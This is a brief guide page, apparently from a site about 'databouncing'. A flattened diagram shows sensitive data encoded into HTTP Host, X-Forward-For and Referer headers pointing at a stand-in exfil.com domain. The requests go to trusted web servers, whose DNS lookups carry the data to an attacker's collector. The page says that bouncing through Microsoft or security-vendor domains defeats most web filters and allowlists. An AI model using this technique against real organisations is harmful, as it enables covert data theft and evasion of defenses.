Web Headers (HLD)

  • @site.url: https://databouncing.io
  • path: /webheadershld/
  • excerpt: Mermaid Diagram Journey of Databouncing with HTTP Web Headers via trusted web servers and ultimately handed over to the exfil DNS
  • published date:
  • reading time: 1 minute
  • tag: Guides
  • authors: JC

This Mermaid Diagram gives you a visualization of the journey of carefully positioned exfildata on it's way to an informed listener, the headers are examples but we've found Host headers being the most popular, others work, and you should find them, but these are the top few.

Exfil SystemTrusted WebserversDNS Server - Exfil CollectHTTP Requests to high-integrity domainsHeaders: Host: secretmessage1.exfil.comHeaders: X-Forward-For: secretmessage2.exfil.comHeaders: Referer: secretmessage3.exfil.comIncoming HTTP requests delivered to trusted webserver, containing sensitive exfiltrated data in headersHeaders: Host: secretmessage1.exfil.comHeaders: X-Forward-For: secretmessage2.exfil.comHeaders: Referer: secretmessage3.exfil.comHTTP ResponseConfirms receipt of HTTP request with sensitive data in the headersLookup secretmessage1.exfil.comExfiltration Data Received (Hostname: secretmessage1.exfil.com)IP for secretmessage1.exfil.comReceived IP address corresponding to secretmessage1.exfil.comLookup secretmessage2.exfil.comExfiltration Data Received (Hostname: secretmessage2.exfil.com)IP for secretmessage2.exfil.comReceived IP address corresponding to secretmessage2.exfil.comLookup secretmessage3.exfil.comExfiltration Data Received (Hostname: secretmessage3.exfil.com)IP for secretmessage3.exfil.comReceived IP address corresponding to secretmessage3.exfil.comalt[Hostname Lookup Solicitation]DNS Resolution CompleteWeb server returns the final HTTP response to the client, confirming successful hostname lookupsExfil SystemTrusted WebserversDNS Server - Exfil Collect

So, If you imagine the high integrity domains being something like Microsoft, or your defense provider, or analytics, or even just an associated domain that's been seen in your DNS TXT records, or is a known service provider to your organization, this is more than enough for most web filtering systems, and allowlists.